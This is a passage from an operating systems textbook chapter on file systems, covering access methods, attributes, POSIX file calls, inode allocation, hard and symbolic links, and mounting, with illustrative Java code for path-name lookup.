format. The PDP-11 computer is extinct by now, but it lives on through the 0407 code!
3. The type of a file may be indicated by its name. Sometimes this is just a convention, and
sometimes it's enforced by the OS or by certain programs. For example, the UNIX Java
compiler refuses to believe that a file contains Java source unless its name ends with
.java.
Some systems enforce the types of files more vigorously than others. File types may be enforced
• Not at all,
• Only by convention,
• By certain programs (e.g. the Java compiler), or
• By the operating system itself.
UNIX tends to be very lax in enforcing types.
7.3 Access Methods and Protection
Many systems support various access modes for operations on a file, such as sequential, random,
and indexed.
• Sequential. Read or write the next record or next n bytes of the file. Usually, sequential
access also allows a rewind operation.
• Random. Read or write the nth record or bytes i through j. UNIX provides an equivalent
facility by adding a seek operation to the sequential operations listed above. This
packaging of operations allows random access but encourages sequential access.
• Indexed. Read or write the record with a given key. In some cases, the ``key'' need not be
unique--there can be more than one record with the same key. In this case, programs use
a combination of indexed and sequential operations: get the first record with a given key,
then get other records with the same key by doing sequential reads.
Note that access modes are distinct from file structure--e.g., a record-structured file can be
accessed either sequentially or randomly--but the two concepts are not entirely unrelated. For
example, indexed access mode only makes sense for indexed files.
File Attributes. This is the area where there is the most variation among file systems. Attributes
can also be grouped by general category.
Ownership and Protection. Owner, owner's ``group,'' creator, access-control list (information
about who can do what to this file; for example, perhaps the owner can read or modify it, other
members of his group can only read it, and others have no access).
Time stamps. Time created, time last modified, time last accessed, time the attributes were last
changed, etc. UNIX maintains the last three of these. Some systems record not only when the file
was last modified, but by whom.
Sizes. Current size, size limit, ``high-water mark'', space consumed (which may be larger than
size because of internal fragmentation or smaller because of various compression techniques).
Type Information. As described above: File is ASCII, is executable, is a ``system'' file, is an
Excel spread sheet, etc.
Misc. Some systems have attributes describing how the file should be displayed when a directory
is listed. For example, MacOS records an icon to represent the file and the screen coordinates
where it was last displayed. DOS has a ``hidden'' attribute meaning that the file is not normally
shown. UNIX achieves a similar effect by convention: the ls program that is usually used to list
files does not show files with names that start with a period unless you explicitly request it to (with
the -a option).
UNIX records a fixed set of attributes in the meta-data associated with a file. If you want to
record some fact about the file that is not included among the supported attributes, you have to
use one of the tricks listed above for recording type information: encode it in the name of the
file, put it into the body of the file itself, or store it in a file with a related name (e.g.
``foo.attributes''). Other systems (notably MacOS and Windows NT) allow new attributes to be
invented on the fly. In MacOS, each file has a resource fork, which is a list of (attribute-name,
attribute-value) pairs. The attribute name can be any four-character string, and the attribute value
can be anything at all. Indeed, some kinds of files put the entire ``contents'' of the file in an
attribute and leave the ``body'' of the file (called the data fork) empty.
Operations
POSIX, a standard API (application programming interface) based on UNIX, provides the
following operations (among others) for manipulating files:
fd = open(name, operation)
fd = creat(name, mode)
status = close(fd)
byte_count = read(fd, buffer, byte_count)
byte_count = write(fd, buffer, byte_count)
offset = lseek(fd, offset, whence)
status = link(oldname, newname)
status = unlink(name)
status = stat(name, buffer)
status = fstat(fd, buffer)
status = utimes(name, times)
status = chown(name, owner, group) or fchown(fd, owner, group)
status = chmod(name, mode) or fchmod(fd, mode)
status = truncate(name, size) or ftruncate(fd, size)
Status. Many functions return a ``status'' which is either 0 for success or -1 for errors (there is
another mechanism to get more information about what went wrong). Other functions also use -1 as a
return value to indicate an error.
Name. A character-string name for a file.
Fd. A ``file descriptor'', which is a small non-negative integer used as a short, temporary name
for a file during the lifetime of a process.
Buffer. The memory address of the start of a buffer for supplying or receiving data.
Whence. One of three codes, signifying from start, from end, or from current location.
Mode. A bit-mask specifying protection information.
Operation. An integer code, one of read, write, read and write, and perhaps a few other
possibilities such as append only.
The open call finds a file and assigns a descriptor to it. It also indicates how the file will be used
by this process (read only, read/write, etc.). The creat call is similar, but creates a new (empty)
file. The mode argument specifies protection attributes (such as ``writable by owner but read-only
by others'') for the new file. (Most modern versions of UNIX have merged creat into open by
adding an optional mode argument and allowing the operation argument to specify that the file
should be automatically created if it doesn't already exist.) The close call simply announces that fd is
no longer in use and can be reused for another open or creat.
The read and write operations transfer data between a file and memory. The starting location in
memory is indicated by the buffer parameter; the starting location in the file (called the seek
pointer) is wherever the last read or write left off. The result is the number of bytes transferred.
For write it is normally the same as the byte_count parameter unless there is an error. For read it
may be smaller if the seek pointer starts out near the end of the file. The lseek operation adjusts
the seek pointer (it is also automatically updated by read and write). The specified offset is added
to zero, the current seek pointer, or the current size of the file, depending on the value of whence.
The function link adds a new name (alias) to a file, while unlink removes a name. There is no
function to delete a file; the system automatically deletes it when there are no remaining names
for it.
The stat function retrieves meta-data about the file and puts it into a buffer (in a fixed,
documented format), while the remaining functions can be used to update the meta-data: utimes
updates time stamps, chown updates ownership, chmod updates protection information, and
truncate changes the size (files can be made bigger by write, but only truncate can make them
smaller). Most of these functions come in two flavors: one that takes a file name and one that takes
a descriptor for an open file.
To learn more details about any of these functions, type something like
man 2 lseek
to any UNIX system. The `2' means to look in section 2 of the manual, where system calls are
explained.
Other systems have similar operations, and perhaps a few more. For example, indexed or
indexed sequential files would require a version of seek to specify a key rather than an offset. It
is also common to have a separate append operation for writing to the end of a file.
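As a rough illustration of the sequential-plus-seek style these calls encourage, here is a small Java sketch using RandomAccessFile, whose seek, read, and write methods play roughly the roles of lseek, read, and write; this is only an analogue for illustration, not the POSIX C interface itself.

import java.io.IOException;
import java.io.RandomAccessFile;

class FileOpsDemo {
    public static void main(String[] args) throws IOException {
        // Roughly: fd = open("demo.dat", read/write, create if needed)
        try (RandomAccessFile f = new RandomAccessFile("demo.dat", "rw")) {
            byte[] out = "hello, file system".getBytes();
            f.write(out);                 // write at the current seek pointer

            f.seek(7);                    // like lseek(fd, 7, SEEK_SET)
            byte[] in = new byte[4];
            int n = f.read(in);           // read advances the seek pointer
            System.out.println("read " + n + " bytes: " + new String(in, 0, n));

            f.setLength(5);               // like ftruncate(fd, 5)
        }                                 // close(fd) happens automatically here
    }
}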
The User Interface to Directories
We already talked about file names. One important feature that a file name should have is that it
be unambiguous: There should be at most one file with any given name. The symmetrical
condition, that there be at most one name for any given file, is not necessarily a good thing.
Sometimes it is handy to be able to give multiple names to a file. When we consider
implementation, we will describe two different ways to implement multiple names for a file,
each with slightly different semantics. If there are a lot of files in a system, it may be difficult to
avoid giving two files the same name, particularly if there are multiple users independently
making up names. One technique to assure uniqueness is to prefix each file name with the name
(or user id) of the owner. In some early operating systems, that was the only assistance the
system gave in preventing conflicts.
A better idea is the hierarchical directory structure, first introduced by Multics, then popularized
by UNIX, and now found in virtually every operating system. You probably already know about
hierarchical directories, but we would like to describe them from an unusual point of view, and
then explain how this point of view is equivalent to the more familiar version.
Each file is named by a sequence of names. Although all modern operating systems use this
technique, each uses a different character to separate the components of the sequence when
displaying it as a character string. Multics uses `>', UNIX uses `/', DOS and its descendants use
`\', and MacOS uses ':'. Sequences make it easy to avoid naming conflicts. First, assign a
sequence to each user and only let him create files with names that start with that sequence. For
example, we might be assigned the sequence (``usr'', ``solomon''), written in UNIX as
/usr/solomon. So far, this is the same as just appending the user name to each file name. But it
allows us to further classify our own files to prevent conflicts. When we start a new project, we
can create a new sequence by appending the name of the project to the end of the sequence
assigned to us, and then use this prefix for all files in the project. For example, we might choose
/usr/solomon/cs537 for files associated with this course, and name them /usr/solomon/cs537/foo,
/usr/solomon/cs537/bar, etc. As an extra aid, the system allows us to specify a ``default prefix''
and a short-hand for writing names that start with that prefix. In UNIX, we use the system call
chdir to specify a prefix, and whenever we use a name that does not start with `/', the system
automatically adds that prefix.
It is customary to think of the directory system as a directed graph, with names on the edges.
Each path in the graph is associated with a sequence of names, the names on the edges that make
up the path. For that reason, the sequence of names is usually called a path name. One node is
designated as the root node, and the rule is enforced that there cannot be two edges with the
same name coming out of one node. With this rule, we can use path names to name nodes. Start at
the root node and treat the path name as a sequence of directions, telling us which edge to follow
at each step. It may be impossible to follow the directions (because they tell us to use an edge
that does not exist), but if it is possible to follow them, they will lead us unambiguously to
one node. Thus path names can be used as unambiguous names for nodes. In fact, as we will see,
this is how the directory system is actually implemented. However, we think it is useful to think
of ``path names'' simply as long names used to avoid naming conflicts, since this view clearly
separates the interface from the implementation.
7.4 Implementing File Systems
Files
We will assume that all the blocks of the disk are given block numbers starting at zero and
running through consecutive integers up to some maximum. We will further assume that blocks
with numbers that are near each other are located physically near each other on the disk (e.g.,
same cylinder) so that the arithmetic difference between the numbers of two blocks gives a good
estimate of how long it takes to get from one to the other. First let's consider how to represent an
individual file. There are (at least!) four possibilities:
Contiguous. The blocks of a file are the blocks numbered n, n+1, n+2, ..., m. We can represent
any file with a pair of numbers: the block number of the first block and the length of the file (in
blocks). The advantages of this approach are that it is simple and that the blocks of the file are all
physically near each other on the disk and in order, so that a sequential scan through the file will
be fast.
The problem with this organization is that you can only grow a file if the block following the last
block in the file happens to be free. Otherwise, you would have to find a long enough run of free
blocks to accommodate the new length of the file and copy it. As a practical matter, operating
systems that use this organization require the maximum size of the file to be declared when it is
created and pre-allocate space for the whole file. Even then, storage allocation has all the
problems we considered when studying main-memory allocation including external
fragmentation.
Linked List. A file is represented by the block number of its first block, and each block contains
the block number of the next block of the file. This representation avoids the problems of the
contiguous representation: We can grow a file by linking any disk block onto the end of the list,
and there is no external fragmentation. However, it introduces a new problem: Random access is
effectively impossible. To find the 100th block of a file, we have to read the first 99 blocks just
to follow the list. We also lose the advantage of very fast sequential access to the file since its
blocks may be scattered all over the disk. However, if we are careful when choosing blocks to
add to a file, we can retain pretty good sequential access performance.
Both the space overhead (the percentage of the space taken up by pointers) and the time
overhead (the percentage of the time seeking from one place to another) can be decreased by
using larger blocks. The hardware designer fixes the block size (which is usually quite small) but
the software can get around this problem by using ``virtual'' blocks, sometimes called clusters.
The OS simply treats each group of (say) four contiguous physical disk sectors as one cluster.
Large clusters, particularly if they can be of variable size, are sometimes called extents. Extents can
be thought of as a compromise between linked and contiguous allocation.
Disk Index. The idea here is to keep the linked-list representation, but take the link fields out of
the blocks and gather them together all in one place. This approach is used in the ``FAT'' file
system of DOS, OS/2 and older versions of Windows. At some fixed place on disk, allocate an
array ``I'' with one element for each block on the disk, and move the link field from block n to
I[n]. The whole array of links, called a file allocation table (FAT), is now small enough that it can
be read into main memory when the system starts up. Accessing the 100th block of a file still
requires walking through 99 links of a linked list, but now the entire list is in memory, so time to
traverse it is negligible (recall that a single disk access takes as long as 10's or even 100's of
thousands of instructions). This representation has the added advantage of getting the ``operating
system'' stuff (the links) out of the pages of ``user data''. The pages of user data are now full-size
disk blocks, and lots of algorithms work better with chunks that are a power of two bytes long.
Also, it means that the OS can prevent users (who are notorious for screwing things up) from
getting their grubby hands on the system data.
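A minimal Java sketch of this representation follows (the field and method names are invented for illustration): the entire FAT lives in an in-memory array, and finding the Nth block of a file just walks N links through that array, with no disk accesses.

class FatTable {
    static final int FREE = 0;          // this block is unallocated
    static final int END_OF_FILE = -1;  // this block is the last block of its file

    private final int[] fat;            // fat[b] = number of the next block; read
                                        // into memory when the system starts up
    FatTable(int[] fat) { this.fat = fat; }

    // Return the disk block number of the n-th block (0-based) of the file
    // whose first block is firstBlock.
    int nthBlock(int firstBlock, int n) {
        int block = firstBlock;
        for (int i = 0; i < n; i++) {
            if (fat[block] == END_OF_FILE)
                throw new IllegalArgumentException("file has fewer than " + (n + 1) + " blocks");
            block = fat[block];         // follow the link, entirely in main memory
        }
        return block;
    }
}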
The main problem with this approach is that the index array can get quite large with modern
disks. For example, consider a 2 GB disk with 2K blocks. There are a million blocks, so a block
number must be at least 20 bits. Rounded up to an even number of bytes, that's 3 bytes--4 bytes if
we round up to a word boundary--so the array I is three or four megabytes. While that's not an
excessive amount of memory given today's RAM prices, if we can get along with less, there are
better uses for the memory.
File Index. Although a typical disk may contain tens of thousands of files, only a few of them are
open at any one time, and it is only necessary to keep index information about open files in
memory to get good performance. Unfortunately the whole-disk index described in the previous
paragraph mixes index information about all files for the whole disk together, making it difficult
to cache only information about open files. The inode structure introduced by UNIX groups
together index information about each file individually. The basic idea is to represent each file as
a tree of blocks, with the data blocks as leaves. Each internal block (called an indirect block in
UNIX jargon) is an array of block numbers, listing its children in order. If a disk block is 2K
bytes and a block number is four bytes, 512 block numbers fit in a block, so a one-level tree (a
single root node pointing directly to the leaves) can accommodate files up to 512 blocks, or one
megabyte in size. If the root node is cached in memory, the ``address'' (block number) of any
block of the file can be found without any disk accesses. A two-level tree, with 513 total indirect
blocks, can handle files 512 times as large (up to one-half gigabyte).
The only problem with this idea is that it wastes space for small files. Any file with more than
one block needs at least one indirect block to store its block numbers. A 4K file would require
three 2K blocks, wasting up to one third of its space. Since many files are quite small, this is a
serious problem. The UNIX solution is to use a different kind of ``block'' for the root of the tree.
An index node (or inode for short) contains almost all the meta-data about a file listed above:
ownership, permissions, time stamps, etc. (but not the file name). Inodes are small enough that
several of them can be packed into one disk block. In addition to the meta-data, an inode
contains the block numbers of the first few blocks of the file. What if the file is too big to fit all
its block numbers into the inode? The earliest version of UNIX had a bit in the meta-data to
indicate whether the file was ``small'' or ``big.'' For a big file, the inode contained the block
numbers of indirect blocks rather than data blocks. More recent versions of UNIX contain
pointers to indirect blocks in addition to the pointers to the first few data blocks. The inode
contains pointers to (i.e., block numbers of) the first few blocks of the file, a pointer to an
indirect block containing pointers to the next several blocks of the file, a pointer to a doubly
indirect block, which is the root of a two-level tree whose leaves are the next blocks of the file,
and a pointer to a triply indirect block. A large file is thus a lop-sided tree.
A real-life example is given by the Solaris 2.5 version of UNIX. Block numbers are four bytes
and the size of a block is a parameter stored in the file system itself, typically 8K (8192 bytes),
so 2048 pointers fit in one block. An inode has direct pointers to the first 12 blocks of the file, as
well as pointers to singly, doubly, and triply indirect blocks. A file of up to 12+2048+2048*2048
= 4,196,364 blocks or 34,376,613,888 bytes (about 32 GB) can be represented without using
triply indirect blocks, and with the triply indirect block, the maximum file size is
(12+2048+2048*2048+2048*2048*2048)*8192 = 70,403,120,791,552 bytes (slightly more than
2^46 bytes, or about 64 terabytes). Of course, for such huge files, the size of the file cannot be
represented as a 32-bit integer. Modern versions of UNIX store the file length as a 64-bit integer,
called a ``long'' integer in Java. An inode is 128 bytes long, allowing room for the 15 block
pointers plus lots of meta-data. 64 inodes fit in one disk block. Since the inode for a file is kept in
memory while the file is open, locating an arbitrary block of any file requires at most three I/O
operations, not counting the operation to read or write the data block itself.
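The tree walk can be sketched in Java as follows (a minimal model with invented names such as Inode and readPointer; the constants match the example above: 12 direct pointers in the inode and 2048 block numbers per indirect block). Given a file-relative block number, it returns the corresponding disk block number, descending through at most three levels of indirect blocks.

class InodeLookup {
    static final int DIRECT = 12;              // direct pointers in the inode
    static final int PER_BLOCK = 2048;         // block numbers per indirect block

    interface Disk {
        // Read indirect block `blockNo` and return the index-th pointer in it.
        long readPointer(long blockNo, int index);
    }

    static class Inode {
        long[] direct = new long[DIRECT];      // first 12 blocks of the file
        long singleIndirect, doubleIndirect, tripleIndirect;
    }

    // Translate a file-relative block number into a disk block number.
    static long blockNumber(Inode inode, long n, Disk disk) {
        if (n < DIRECT)
            return inode.direct[(int) n];
        n -= DIRECT;
        if (n < PER_BLOCK)                                     // one level
            return disk.readPointer(inode.singleIndirect, (int) n);
        n -= PER_BLOCK;
        if (n < (long) PER_BLOCK * PER_BLOCK) {                // two levels
            long mid = disk.readPointer(inode.doubleIndirect, (int) (n / PER_BLOCK));
            return disk.readPointer(mid, (int) (n % PER_BLOCK));
        }
        n -= (long) PER_BLOCK * PER_BLOCK;                     // three levels
        long lvl2 = disk.readPointer(inode.tripleIndirect,
                (int) (n / ((long) PER_BLOCK * PER_BLOCK)));
        long lvl1 = disk.readPointer(lvl2, (int) ((n / PER_BLOCK) % PER_BLOCK));
        return disk.readPointer(lvl1, (int) (n % PER_BLOCK));
    }
}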
Directories
A directory is simply a table mapping human-readable character-string names to
information about files. The early PC operating system CP/M shows how simple a directory can
be. Each entry contains the name of one file, its owner, size (in blocks) and the block numbers of
16 blocks of the file. To represent files with more than 16 blocks, CP/M used multiple directory
entries with the same name and different values in a field called the extent number. CP/M had
only one directory for the entire system.
DOS uses a similar directory entry format, but stores only the first block number of the file in the
directory entry. The entire file is represented as a linked list of blocks using the disk index
scheme described above. All but the earliest version of DOS provide hierarchical directories
using a scheme similar to the one used in UNIX.
UNIX has an even simpler directory format. A directory entry contains only two fields: a
character-string name (up to 14 characters) and a two-byte integer called an inumber, which is
interpreted as an index into an array of inodes in a fixed, known location on disk. All the
remaining information about the file (size, ownership, time stamps, permissions, and an index to
the blocks of the file) is stored in the inode rather than the directory entry. A directory is
represented like any other file (there's a bit in the inode to indicate that the file is a directory).
Thus the inumber in a directory entry may designate a ``regular'' file or another directory,
allowing arbitrary graphs of nodes. However, UNIX carefully limits the set of operating system
calls to ensure that the set of directories is always a tree. The root of the tree is the file with
inumber 1 (some versions of UNIX use other conventions for designating the root directory).
The entries in each directory point to its children in the tree. For convenience, each directory also has
two special entries: an entry with name ``..'', which points to the parent of the directory in the tree,
and an entry with name ``.'', which points to the directory itself. Inumber 0 is not used, so an
entry is marked ``unused'' by setting its inumber field to 0. The algorithm to convert from a path
name to an inumber might be written in Java as follows.
int namei(int current, String[] path) {
    for (int i = 0; i < path.length; i++) {
        if (inode[current].type != DIRECTORY)
            throw new Exception("not a directory");
        current = nameToInumber(inode[current], path[i]);
        if (current == 0)
            throw new Exception("no such file or directory");
    }
    return current;
}
The procedure nameToInumber(Inode node, String name) (not shown) reads through the
directory file represented by the inode node, looks for an entry matching the given name and
returns the inumber contained in that entry. The procedure namei walks the directory tree,
starting at a given inode and following a path described by a sequence of strings. There is a
procedure with this name in the UNIX kernel. Files are always specified in UNIX system calls
by a character-string path name. You can learn the inumber of a file if you like, but you can't use
the inumber when talking to the UNIX kernel. Each system call that has a path name as an
argument uses namei to translate it to an inumber. If the argument is an absolute path name (it
starts with `/'), namei is called with current == 1. Otherwise, current is the current working
directory.
Since all the information about a file except its name is stored in the inode, there can be more
than one directory entry designating the same file. This allows multiple aliases (called links) for a
file. UNIX provides a system call link (old-name, new-name) to create new names for existing
files. The call link ("/a/b/c", "/d/e/f") works something like this:
if (namei(1, parse("/d/e/f")) != 0)
    throw new Exception("file already exists");
int dir = namei(1, parse("/d/e"));
if (dir == 0 || inode[dir].type != DIRECTORY)
    throw new Exception("not a directory");
int target = namei(1, parse("/a/b/c"));
if (target == 0)
    throw new Exception("no such file or directory");
if (inode[target].type == DIRECTORY)
    throw new Exception("cannot link to a directory");
addDirectoryEntry(inode[dir], target, "f");
The procedure parse (not shown here) is assumed to break up a path name into its components.
If, for example, /a/b/c resolves to inumber 123, the entry (123, "f") is added to the directory file
designated by "/d/e". The result is that both "/a/b/c" and "/d/e/f" resolve to the same file (the one
with inumber 123).
We have seen that a file can have more than one name. What happens if it has no names (does
not appear in any directory)? Since the only way to name a file in a system call is by a path
name, such a file would be useless. It would consume resources (the inode and probably some
data and indirect blocks) but there would be no way to read it, write to it, or even delete it. UNIX
protects against this ``garbage collection'' problem by using reference counts. Each inode
contains a count of the number of directory entries that point to it. ``User'' programs are not
allowed to update directories directly. System calls that add or remove directory entries (creat,
link, mkdir, rmdir, etc) update these reference counts appropriately. There is no system call to
delete a file, only the system call unlink(name) which removes the directory entry corresponding
to name. If the reference count of an inode drops to zero, the system automatically deletes the
file and returns all of its blocks to the free list.
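Here is a minimal Java sketch of the reference-counting discipline (the field and method names are invented for illustration): link increments the count of an existing inode, unlink removes one directory entry and decrements the count, and the inode and its blocks are reclaimed only when the count reaches zero.

class InodeRefCounting {
    static class Inode {
        int linkCount;            // number of directory entries pointing here
        boolean allocated = true;
    }

    // Called by the link(oldname, newname) system call after the new
    // directory entry has been added.
    static void link(Inode inode) {
        inode.linkCount++;
    }

    // Called by unlink(name) after the directory entry has been removed.
    static void unlink(Inode inode) {
        inode.linkCount--;
        if (inode.linkCount == 0) {
            // No name refers to this file any more: free its data blocks
            // and the inode itself (block freeing omitted in this sketch).
            inode.allocated = false;
        }
    }
}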
We saw before that the reference counting algorithm for garbage collection has a fatal flaw: If
there are cycles, reference counting will fail to collect some garbage. UNIX avoids this problem
by making sure cycles cannot happen. The system calls are designed so that the set of directories
will always be a single tree rooted at inode 1: mkdir creates a new directory (empty except for the . and ..
entries) as a leaf of the tree, rmdir is only allowed to delete a directory that is empty (except for
the . and .. entries), and link is not allowed to link to a directory. Because links to directories are
not allowed, the only place the file system is not a tree is at the leaves (regular files) and that
cannot introduce cycles.
Although this algorithm provides the ability to create aliases for files in a simple and secure
manner, it has several flaws:
• It's hard to figure out how to charge users for disk space. Ownership is associated with
the file, not the directory entry (the owner's id is stored in the inode). A file cannot be
deleted without finding all the links to it and deleting them. If we create a file and you
make a link to it, we will continue to be charged for it even if we try to remove it through
our original name for it. Worse still, your link may be in a directory we don't have access
to, so we may be unable to delete the file, even though we are being charged for its space.
Indeed, you could make it much bigger after we have no access to it.
• There is no way to make an alias for a directory.
• As we will see later, links cannot cross boundaries of physical disks.
• Since all aliases are equal, there's no one ``true name'' for a file. You can find out whether
two path names designate the same file by comparing inumbers. There is a system call to
get the meta-data about a file, and the inumber is included in that information. But there
is no way of going in the other direction: to get a path name for a file given its inumber,
or to find a path name of an open file. Even if you remember the path name used to get to
the file, that is not a reliable ``handle'' to the file (for example, to link two files together by
storing the name of one in the other). One of the components of the path name could be
removed, thus invalidating the name even though the file still exists under a different
name.
While it's not possible to find the name (or any name) of an arbitrary file, it is possible to figure
out the name of a directory. Directories do have unique names because the directories form a
tree, and one of the properties of a tree is that there is a unique path from the root to any node.
The ``..'' and ``.'' entries in each directory make this possible. Here, for example, is code to find
the name of the current working directory.
class DirectoryEntry {
    int inumber;
    String name;
}

String cwd() {
    FileInputStream thisDir = new FileInputStream(".");
    int thisInumber = nameToInumber(thisDir, ".");
    return getPath(".", thisInumber);
}

String getPath(String currentName, int currentInumber) {
    String parentName = currentName + "/..";
    FileInputStream parent = new FileInputStream(parentName);
    int parentInumber = nameToInumber(parent, ".");
    String fname = inumberToName(parent, currentInumber);
    if (parentInumber == 1)
        return "/" + fname;
    else
        return getPath(parentName, parentInumber) + "/" + fname;
}
The procedure nameToInumber is similar to the procedure with the same name described above,
but takes an InputStream as an argument rather than an inode. Many versions of UNIX allow a
program to open a directory for reading and read its contents just like any other file. In such
systems, it would be easy to write nameToInumber as a user-level procedure if you know the
format of a directory. The procedure inumberToName is similar, but searches for an entry
containing a particular inumber and returns the name field of the entry.
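For concreteness, here is a minimal sketch of how nameToInumber and inumberToName might be written as user-level code on a system that lets a program read a directory like an ordinary file. It assumes the original 16-byte directory entry format described later in this chapter (a 2-byte inumber followed by a 14-byte null-padded name); the class name, the use of DataInputStream, and the big-endian byte order are illustrative assumptions, not the actual UNIX code.

import java.io.*;

// Sketch of the two helpers used by cwd()/getPath(), assuming 16-byte entries:
// a 2-byte inumber followed by a 14-byte null-padded name.
class DirHelpers {
    static int nameToInumber(InputStream dir, String name) throws IOException {
        DataInputStream in = new DataInputStream(dir);
        byte[] nameBytes = new byte[14];
        try {
            while (true) {
                int inumber = in.readUnsignedShort();   // 2-byte inumber (byte order assumed)
                in.readFully(nameBytes);                // 14-byte name field
                if (inumber != 0 && name.equals(new String(nameBytes).trim()))
                    return inumber;
            }
        } catch (EOFException e) {
            return 0;                                   // not found
        }
    }

    static String inumberToName(InputStream dir, int target) throws IOException {
        DataInputStream in = new DataInputStream(dir);
        byte[] nameBytes = new byte[14];
        try {
            while (true) {
                int inumber = in.readUnsignedShort();
                in.readFully(nameBytes);
                if (inumber == target)
                    return new String(nameBytes).trim();
            }
        } catch (EOFException e) {
            return null;                                // not found
        }
    }
}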
Symbolic Links
To get around the limitations with the original UNIX notion of links, more recent versions of
UNIX introduced the notion of a symbolic link (to avoid confusion, the original kind of link,
described in the previous section, is sometimes called a hard link). A symbolic link is a new type
of file, distinguished by a code in the inode from directories, regular files, etc. When the namei
procedure that translates path names to inumbers encounters a symlink, it treats the contents of
the file as a pathname and uses it to continue the translation. If the contents of the file is a
relative path name (it does not start with a slash), it is interpreted relative to the directory
containing the link itself, not the current working directory of the process doing the lookup.
int namei(int current, String[] path) {
    for (int i = 0; i < path.length; i++) {
        if (inode[current].type != DIRECTORY)
            throw new Exception("not a directory");
        int parent = current;            // directory containing the entry we are about to look up
        current = nameToInumber(inode[parent], path[i]);
        if (current == 0)
            throw new Exception("no such file or directory");
        while (inode[current].type == SYMLINK) {
            String link = getContents(inode[current]);
            String[] linkPath = parse(link);
            if (link.charAt(0) == '/')
                current = namei(1, linkPath);        // absolute link: restart at the root
            else
                current = namei(parent, linkPath);   // relative link: start at the containing directory
            if (current == 0)
                throw new Exception("no such file or directory");
        }
    }
    return current;
}
The main changes from the previous version of this procedure are the addition of the while loop
and a local variable that remembers the directory containing the entry, so that a relative link can
be resolved against it. Any time the procedure encounters a node of type SYMLINK, it recursively
calls itself to translate the contents of the file, interpreted as a path name, into an inumber.
7.5 Implementation
Although the implementation looks complicated, it does just what you would expect in normal
situations. For example, suppose there is an existing file named /a/b/c and an existing directory
/d. Then the command ln -s /a/b /d/e makes the path name /d/e a synonym for /a/b, and also
makes /d/e/c a synonym for /a/b/c. From the user's point of view, /d/e simply looks like another
name for /a/b. In implementation terms, /d/e is a separate inode of type symlink whose contents
are the path name /a/b.
Here's a more elaborate example that illustrates symlinks with relative path names. Suppose we
have an existing directory /usr/solomon/cs537/s90 with various sub-directories and we are
setting up project 5 for this semester. We might do something like the following commands; the
resulting logical and physical links are shown in the figures below. All three of the cat commands
refer to the same file.
cd /usr/solomon/cs537
mkdir f96
cd f96
ln -s ../s90/proj5 proj5.old
cat proj5.old/foo.c
cd /usr/solomon/cs537
cat f96/proj5.old/foo.c
cat s90/proj5/foo.c
Figure: logical links resulting from the commands above.
Figure: physical links resulting from the commands above.
The added flexibility of symlinks over hard links comes at the cost of reduced safety. Symlinks
are neither required nor guaranteed to point to valid files. You can remove a file out from under a
symlink, and in fact, you can create a symlink to a non-existent file. Symlinks can also have
cycles. For example, this works fine:
cd /usr/solomon
mkdir bar
ln -s /usr/solomon foo
ls /usr/solomon/foo/foo/foo/foo/bar
However, in some cases, symlinks can cause infinite loops or infinite recursion in the namei
procedure. The real version in UNIX puts a limit on how many times it will iterate and returns an
error code of ``too many links'' if the limit is exceeded. Symlinks to directories can also cause the
``change directory'' command cd to behave in strange ways. Most people expect the two commands
cd foo
cd ..
to cancel each other out. But in the last example, the commands
cd /usr/solomon
cd foo
cd ..
would leave you in the directory /usr. Some shell programs treat cd specially and remember what
alias you used to get to the current directory. After cd /usr/solomon; cd foo; cd foo, the current
directory is /usr/solomon/foo/foo, which is an alias for /usr/solomon, but the command cd .. is
treated as if you had typed cd /usr/solomon/foo.
Mounting
What if your computer has more than one disk? In many operating systems (including DOS and
its descendants) a pathname starts with a device name, as in C:\usr\solomon (by convention, C is
the name of the default hard disk). If you leave the device prefix off a path name, the system
supplies a default current device similar to the current directory. UNIX allows you to glue
together the directory trees of multiple disks to create a single unified tree. There is a system call
mount(device, mount_point)
where device names a particular disk drive and mount_point is the path name of an existing node
in the current directory tree (normally an empty directory). The result is similar to a hard link:
The mount point becomes an alias for the root directory of the indicated disk. Here's how it
works: The kernel maintains a table of existing mounts represented as (device1, inumber,
device2) triples. During namei, whenever the current (device, inumber) pair matches the first two
fields in one of the entries, the current device and inumber become device2 and 1, respectively.
Here's the expanded code:
int namei(int curi, int curdev, String[] path) {
    for (int i = 0; i < path.length; i++) {
        if (disk[curdev].inode[curi].type != DIRECTORY)
            throw new Exception("not a directory");
        int parent = curi;               // directory containing the entry we are about to look up
        curi = nameToInumber(disk[curdev].inode[parent], path[i]);
        if (curi == 0)
            throw new Exception("no such file or directory");
        while (disk[curdev].inode[curi].type == SYMLINK) {
            String link = getContents(disk[curdev].inode[curi]);
            String[] linkPath = parse(link);
            if (link.charAt(0) == '/')
                curi = namei(1, curdev, linkPath);       // absolute link: restart at the root
            else
                curi = namei(parent, curdev, linkPath);  // relative link: start at the containing directory
            if (curi == 0)
                throw new Exception("no such file or directory");
        }
        int newdev = mountLookup(curdev, curi);
        if (newdev != -1) {
            curdev = newdev;
            curi = 1;
        }
    }
    return curi;
}
In this code, we assume that mountLookup searches the mount table for a matching entry,
returning -1 if no matching entry is found. There is also a special case (not shown here) for ``..''
so that the ``..'' entry in the root directory of a mounted disk behaves like a pointer to the parent
directory of the mount point.
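As an illustration, here is a minimal sketch of the mount table and the mountLookup helper assumed by the code above. The MountEntry class, the fixed-size table, and the method names are our own choices for the example; a real kernel uses its own data structures and locking.

// Sketch of the table of (device1, inumber, device2) triples described above.
class MountEntry {
    int dev1;        // device holding the mount point
    int inumber;     // inumber of the mount point directory on dev1
    int dev2;        // device whose root is mounted there
}

class MountTable {
    static MountEntry[] mounts = new MountEntry[16];

    // Record that the root of device dev2 is mounted on (dev1, inumber).
    static void mount(int dev1, int inumber, int dev2) {
        for (int i = 0; i < mounts.length; i++) {
            if (mounts[i] == null) {
                MountEntry e = new MountEntry();
                e.dev1 = dev1; e.inumber = inumber; e.dev2 = dev2;
                mounts[i] = e;
                return;
            }
        }
    }

    // Return the mounted device if (dev, inumber) is a mount point, else -1.
    static int mountLookup(int dev, int inumber) {
        for (MountEntry e : mounts)
            if (e != null && e.dev1 == dev && e.inumber == inumber)
                return e.dev2;
        return -1;
    }
}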
The Network File System (NFS) from Sun Microsystems extends this idea to allow you to mount
a disk from a remote computer. The device argument to the mount system call names the remote
computer as well as the disk drive and both pieces of information are put into the mount table.
Now there are three pieces of information to define the ``current directory'': the inumber, the
device, and the computer. If the current computer is remote, all operations (read, write, create,
delete, mkdir, rmdir, etc.) are sent as messages to the remote computer. Information about
remote open files, including a seek pointer and the identity of the remote machine, is kept
locally. Each read or write operation is converted locally to one or more requests to read or write
blocks of the remote file. NFS caches blocks of remote files locally to improve performance.
Special Files
We said that the UNIX mount system call has the name of a disk device as an argument. How do
